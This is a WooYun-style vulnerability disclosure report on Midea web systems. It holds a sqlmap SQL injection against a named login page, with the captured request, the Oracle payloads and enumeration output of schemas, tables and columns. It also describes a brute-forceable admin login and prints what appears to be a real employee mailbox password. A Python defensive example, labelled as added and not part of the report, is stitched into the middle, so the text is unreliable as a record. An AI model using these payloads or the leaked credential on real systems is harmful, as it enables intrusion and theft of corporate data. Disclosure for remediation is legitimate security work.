WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-12-11: Details sent to the vendor, awaiting vendor action
2015-12-11: Vendor confirmed; details visible to the vendor only
2015-12-21: Details disclosed to core white hats and relevant domain experts
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public
Hoping for a front-page slot, thanks reviewers ^_^
0X01 First, the SQL injection. Vulnerable URL:
http://jders.midea.com.cn/Login.aspx
A quick test showed that the login parameters are passed through without any filtering.
Burp capture of the login request, saved as post.txt:
POST /Login.aspx?_dc=1449797912532 HTTP/1.1
Accept: */*
X-Ext.Net: delta=true
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://jders.midea.com.cn/Login.aspx
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: jders.midea.com.cn
Content-Length: 3065
Pragma: no-cache

__EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-%7Cpublic%7CbtLoginClick&__VIEWSTATE=%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&__EVENTVALIDATION=%2FwEWAgK0u6rDCwLk1b%2BVAi55K9r446%2BWQ%2F9WWUM6RazKyEiocm%2B1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng%3D%3D&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ%3D%3D&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU%3D&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY%3D&lb8=
sqlmap command (the injection is in the tbUid POST field, backend fingerprinted as Oracle):
sqlmap.py -r post.txt --dbs -p tbUid --dbms oracle
Result:
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
POST parameter 'tbUid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 170 HTTP(s) requests:
---
Parameter: tbUid (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=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&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEiocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'nhrH'='nhrH&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=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&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEiocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 9583=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'IqFl'='IqFl&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
---
[09:47:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[09:47:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:47:40] [INFO] fetching database (schema) names
[09:47:49] [INFO] the SQL query used returns 8 entries
[09:47:53] [INFO] retrieved: CTXSYS
[09:47:56] [INFO] retrieved: EXFSYS
[09:48:00] [INFO] retrieved: JD_ERS
[09:48:03] [INFO] retrieved: MDSYS
[09:48:07] [INFO] retrieved: OLAPSYS
[09:48:10] [INFO] retrieved: SYS
[09:48:13] [INFO] retrieved: SYSTEM
[09:48:16] [INFO] retrieved: WLEAM
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] JD_ERS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WLEAM
Eight databases (Oracle schemas) are reachable, including SYS and SYSTEM:
All tables in the current schema (JD_ERS):
Database: JD_ERS
[264 tables]
A, A1, A2, ACCOUNT_TEST,
AF_APPLY_DETAIL_BUSI, AF_APPLY_DETAIL_CULTIVATE, AF_APPLY_DETAIL_EVENCTION, AF_APPLY_DETAIL_TEAM, AF_APPLY_DETAIL_UNIVERSAL, AF_APPLY_MAIN,
AM_MAIL_TEMPLATE, AM_MAIL_TEMPLATE_WF, AM_SEND_MAIL_LOG,
AP_PAYMENT_BILL_BACK, AP_PAYMENT_BUDGET_ALL, AP_PAYMENT_HEADER, AP_PAYMENT_INTERFACE, AP_PAYMENT_LINE, AP_PAYMENT_SCHEDULE_DETAIL, AP_PAYMENT_SCHEDULE_HEADER, AP_PAYMENT_SCHEDULE_LINE, AP_PAYMENT_SCHEDULE_RELATION, AP_PAYMENT_ZK_ALL,
AUTHORITY_ORG_BUDGET, AUTHORITY_ORG_BUDGET_DETAIL, AUTHORITY_USER_DETAIL,
B, BAOSI_REQUIRE_LOG, BAOSI_REQUIRE_RIGHT, BAOSI_SYS_PROJECT,
BAS_ACCOUNT_TITLE, BAS_ACCOUNT_TITLE_DEPT, BAS_ACCOUNT_TITLE_OUTLAY, BAS_AREA, BAS_AREA_CITY, BAS_ATTACHMENT, BAS_BILL_NUMBER_ITEM, BAS_BILL_NUMBER_MAIN, BAS_BILL_NUMBER_RIGHT, BAS_BUDGET_AUTHORITY_DETAIL, BAS_BUDGET_AUTHORITY_MAIN, BAS_BUDGET_AUTHORITY_USERS, BAS_COSTCENTER, BAS_COSTINFORMATION_DATA, BAS_COST_ITEM, BAS_CURRENCY, BAS_EMAIL, BAS_ENTERTAIN, BAS_ERP_SYNCHRONOUS, BAS_EXCHANGE, BAS_HOLIDAY, BAS_LEVEL_AREA, BAS_LEVEL_POST, BAS_MIP_NOTIFY_INTERFACE, BAS_MODULE_MANAGEMENT, BAS_MODULE_WORKFLOW, BAS_ORG, BAS_ORGANIZATION, BAS_ORG_RIGHT, BAS_OUTLAY_ITEM_DATA, BAS_PAYMENT, BAS_PERSONAL, BAS_POSTLEVEL_TEMP, BAS_POSTLEVLE, BAS_PRIVATETOPUBLICCAR_DATA, BAS_PUBLICCAR_DATA, BAS_SECRETLEVEL_DATA, BAS_SECTION_CUSTOMER, BAS_SECTION_OFFICE, BAS_SUBJECT, BAS_SUBJECT_DEPT, BAS_SYNC_ERRITEMS, BAS_SYNC_LOG, BAS_TELEPHONE_DATA, BAS_TEMPLATE, BAS_TRAVEL_EXPENSE, BAS_URGENCYLEVEL_DATA, BAS_VENDOR,
BD_BUDGET, BD_BUDGET_0804, BD_BUDGET_20150208, BD_BUDGET_20150302, BD_BUDGET_20150822, BD_BUDGET_20150825, BD_BUDGET_ADD_DETAIL, BD_BUDGET_ADD_MAIN, BD_BUDGET_ADJUST_DETAIL, BD_BUDGET_ADJUST_MAIN, BD_BUDGET_APPLY_DETAIL, BD_BUDGET_APPLY_ITEM, BD_BUDGET_APPLY_MAIN, BD_BUDGET_F064, BD_BUDGET_F080, BD_BUDGET_INPUT_DETAIL, BD_BUDGET_INPUT_MAIN, BD_BUDGET_LOCK_REC, BD_BUDGET_ORG, BD_BUDGET_ORG_0804, BD_BUDGET_ORG_COL, BD_BUDGET_ORG_COL_0804, BD_BUDGET_ORG_DEPART, BD_BUDGET_ORG_DEPART_0804, BD_BUDGET_ORG_USER, BD_BUDGET_ORG_USER_0804, BD_BUDGET_T, BD_BUDGET_TEMP1, BD_BUDGET_TEMP2, BD_BUDGET_TEMP3, BD_BUDGET_TEMPLATE_DETAIL, BD_BUDGET_TEMPLATE_MAIN, BD_BUDGET_TEMP_ZF, BD_BUDGET_TEST, BD_ORG, BD_TEST, BD_ZF_DR, BD_ZF_DR_2015,
BEE_ELECTRONICINVOICE, BEE_ELECTRONICINVOICEREL, BEE_ELECTRONICINVOICEREL_TEMP, BEE_ELECTRONICINVOICE_TEMP, BEE_INTERFACE_LIST, BEE_SYNC_LOG, BEE_TICKETBILLRELATION, BEE_TICKETBILLRELATION_TEMP, BEE_TICKETORDER, BEE_TICKETORDER_TEMP, BEE_TICKETSETTLEMENT, BEE_TICKETSETTLEMENTREL, BEE_TICKETSETTLEMENTREL_TEMP, BEE_TICKETSETTLEMENT_TEMP,
BILL_RIGHT_DEPT, BILL_RIGHT_EMP, BILL_RIGHT_MAIN, BILL_RIGHT_MENU, BILL_TYPECODE_DATA, BUDGET_TEST, C,
CASH_RECEIPT_INPUT, CASH_RECEIPT_INTERFACE, CASH_RECEIPT_LINE, CASH_RECEIPT_MAIN, CASH_RECEIPT_MARK_DETAIL, CASH_RECEIPT_MARK_HEADER, CASH_RECEIPT_MARK_LINE, CASH_RECEIPT_MARK_RELATION,
DEPARTMENTNUMBER_TMP, DETAIN_AGREEMENT_HEADER, ERS_LOGS,
FD_ADVANCE, FD_INVOICE, FD_LOAN, FD_PAYABLE_DETAIL, FD_PAYABLE_MAIN, FD_PAYMENT_REC, FD_REFUND, FD_REFUND_DETAIL, FD_VERFICATION, FD_VERFICATION_DETAIL,
IMG_BILLCODE_STATUS_INTERFACE, IMG_SYNC_SET, LSS_067, MP_MERGE_PAYMENT_DETAIL, MP_MERGE_PAYMENT_MAIN,
MV_ERP_BANK_ACCOUNTS, MV_ERP_BUDGET_DETAIL, MV_ERP_CURRENCY, MV_ERP_DETAIL_SUBJECT, MV_ERP_EXCHANGE, MV_ERP_GL_CODE_COMBINATIONS, MV_ERP_PAYMENT_DOCUMENTS, MV_ERP_PAY_REC, MV_ERP_PAY_REC_TEST, MV_ERP_SUPPLIER, MV_ERP_SUPPLIER_SITE, MV_ERP_TERMS,
PARTS, PBCATCOL, PBCATEDT, PBCATFMT, PBCATTBL, PBCATVLD, RP_DEIFINED_ORG_BUDGET,
RS_BUSI_DETAIL, RS_COST_BEE_DETAIL, RS_COST_DETAIL, RS_COST_MAIN, RS_TRAVELLING_BEE_DETAIL, RS_TRAVELLING_DETAIL, RS_TRAVELLING_MAIN,
S010, S011, S011_TEMP, S012, S012_TEMP, S012_TEMP_ZF, S020, S021, S022, S023, S024, S027, S033, S034, S035, S036, S037, S040, S041, S050, S080, S081,
S201, S202, S203, S204, S205, S206, S207, S208, S209, S210, S211, S212, S213, S214, S215, S220, S231, S232, S240, S241, S242, S243, S250, S251, S252, S261, S263, S264, S265, S266, S267, S268,
SHARE_ACCOUNTS, SHARE_DETAIL, SHARE_MAIN, SMS_SEND, SMS_SEND_HISTORY, SMS_SYS_CONFIG, SUBJECT_TEST, SUPPLIER_BANK_ACCOUNTS,
TEMP_ORACLEPANEL, TEMP_SVXBAR, TEMP_TABLESPACE, TEST1, USER_TEMP,
ZF_ACCOUNT, ZF_COSTCENTER, ZF_DEPT, ZF_DR_BUDGET, ZF_S011, ZF_S207, ZF_S267, ZF_SUBJECT
A large amount of sensitive data is involved (payment, budget, supplier bank account and e-mail tables):
Column details for BAS_EMAIL:
[11:16:34] [INFO] fetching columns for table 'BAS_EMAIL' in database 'JD_ERS'
[11:16:34] [INFO] the SQL query used returns 18 entries
Database: JD_ERS
Table: BAS_EMAIL
[18 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CREATENAME      | VARCHAR2 |
| CREATETIME      | DATE     |
| UPDATEID        | VARCHAR2 |
| UPDATENAME      | VARCHAR2 |
| UPDATETIME      | DATE     |
| FD_ID           | NUMBER   |
| SEQUENCE_ID     | NUMBER   |
| EMAIL_SUBJECT   | VARCHAR2 |
| EMAIL_RECEIVER  | VARCHAR2 |
| OTHER_EMAIL     | VARCHAR2 |
| EMAIL_CONTENT   | CLOB     |
| EMAIL_FORMAT    | VARCHAR2 |
| EMAIL_SENDER    | VARCHAR2 |
| IS_BCC          | NUMBER   |
| PT_ID           | VARCHAR2 |
| UPLOAD_MIP_FLAG | NUMBER   |
| SEND_FLAG       | NUMBER   |
| CREATEID        | VARCHAR2 |
+-----------------+----------+
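To make the injection sqlmap identified above concrete, here is an added example; it is not Midea's code and not part of the original report. An in-memory SQLite table stands in for Oracle, so the XMLType error-based and ALL_USERS heavy-query payloads from the sqlmap output are only pattern-matched, never executed. It contrasts the string-concatenated login query the report implies with a bind-variable version using the same true/false differential sqlmap relies on, and runs the two captured tbUid payloads through a small signature check that a log or WAF rule could apply to Login.aspx request bodies. The table and column names (USERS, UID, PWD) and the sample rows are assumptions.

```python
"""Added illustration of the tbUid injection (not Midea's code, not from the report).

SQLite stands in for Oracle: the XMLType error-based and ALL_USERS heavy-query
payloads are pattern-matched here, never executed. USERS/UID/PWD and the two
sample rows are assumptions.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlencode

# The two tbUid values sqlmap reported, copied from its output above.
ERROR_BASED_PAYLOAD = (
    "dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)"
    "||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END)"
    " FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)"
    " AND 'nhrH'='nhrH"
)
TIME_BASED_PAYLOAD = (
    "dd' AND 9583=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,"
    "ALL_USERS T4,ALL_USERS T5) AND 'IqFl'='IqFl"
)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the JD_ERS schema with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE USERS (UID TEXT, PWD TEXT)")
    con.executemany("INSERT INTO USERS VALUES (?, ?)",
                    [("admin", "S3cret!"), ("user1", "Hunter2")])  # constructed
    return con


def login_vulnerable(con: sqlite3.Connection, tb_uid: str, tb_pwd: str) -> int:
    """The defect the report implies: form fields pasted into the SQL text.
    Returns the matching row count, so 1 means 'logged in'."""
    sql = f"SELECT COUNT(*) FROM USERS WHERE UID='{tb_uid}' AND PWD='{tb_pwd}'"
    return con.execute(sql).fetchone()[0]


def login_parameterized(con: sqlite3.Connection, tb_uid: str, tb_pwd: str) -> int:
    """Same query with bind variables; a quote inside tbUid is just data."""
    sql = "SELECT COUNT(*) FROM USERS WHERE UID=? AND PWD=?"
    return con.execute(sql, (tb_uid, tb_pwd)).fetchone()[0]


def is_injectable(con: sqlite3.Connection, login) -> bool:
    """Boolean differential in the spirit of sqlmap's check: inject a true and a
    false condition into tbUid and see whether the application behaves differently.
    A non-existent user is used so only the injected OR branch can produce rows."""
    true_rows = login(con, "nobody' OR 1=1--", "dd")
    false_rows = login(con, "nobody' OR 1=2--", "dd")
    return true_rows != false_rows


# Oracle-specific sqlmap fingerprints visible in the report's two payloads.
SIGNATURES = {
    "xmltype_error_based": re.compile(r"XMLType\s*\(", re.I),
    "from_dual": re.compile(r"\bFROM\s+DUAL\b", re.I),
    "heavy_query_cross_join": re.compile(r"(?:ALL_USERS\s+T\d\s*,\s*){2,}", re.I),
    "chr_concat": re.compile(r"(?:CHR\(\d+\)\|\|){3,}", re.I),
    "quote_balancing_tail": re.compile(r"AND\s+'(\w+)'='\1\s*$", re.I),
}


def encode_form(**fields) -> str:
    """Build a urlencoded body like the one Burp captured (helper for tests/demo)."""
    return urlencode(fields)


def flag_sqli(post_body: str) -> dict:
    """Scan a urlencoded POST body and return {param: [matched signature names]}.
    Usable as a log or WAF rule over Login.aspx request bodies."""
    hits = {}
    for param, values in parse_qs(post_body, keep_blank_values=True).items():
        for value in values:
            names = sorted(name for name, rx in SIGNATURES.items() if rx.search(value))
            if names:
                hits[param] = names
    return hits


if __name__ == "__main__":
    con = make_db()
    print("vulnerable login injectable:", is_injectable(con, login_vulnerable))
    print("parameterized login injectable:", is_injectable(con, login_parameterized))
    for payload in (ERROR_BASED_PAYLOAD, TIME_BASED_PAYLOAD):
        print(flag_sqli(encode_form(tbUid=payload, tbPwd="dd")))
```

The signature check is deliberately narrow: it keys on the Oracle idioms sqlmap used here (XMLType casting, CHR() concatenation, FROM DUAL, the ALL_USERS self-join, and the `AND 'x'='x` quote-balancing tail), which is useful for hunting this specific scan in historical IIS logs but is not a substitute for the bind-variable fix.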
0X02 Weak password on another site. Vulnerable URL:
http://eng.midea.com.cn/AccountManager/Login?ReturnUrl=%2fContract%2fAlterDetails%2f2e47465d-e155-4d9f-9386-72b1b3a155c2
There is no CAPTCHA on the login form, so it can be brute-forced:
Successful login:
Unexpectedly, the account is an administrator, again exposing sensitive company data:
Another vulnerability that was dismissed:
WooYun: Weak password on a Midea employee mailbox
yangyt Midea123: can leak sensitive company files, the address book, and so on.
As submitted yesterday:
http://www.wooyun.org/bugs/wooyun-2015-0160269/trace/b03134ca0952158157208aef0185ff81
It was rejected, but the vulnerability has not been fixed; please fix it before public disclosure.
Please take this seriously. The vulnerabilities are submitted as a bundle, so 20 rank isn't unreasonable, is it? Thanks.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-11 17:39
The triple gift pack has been received, thanks!
None at present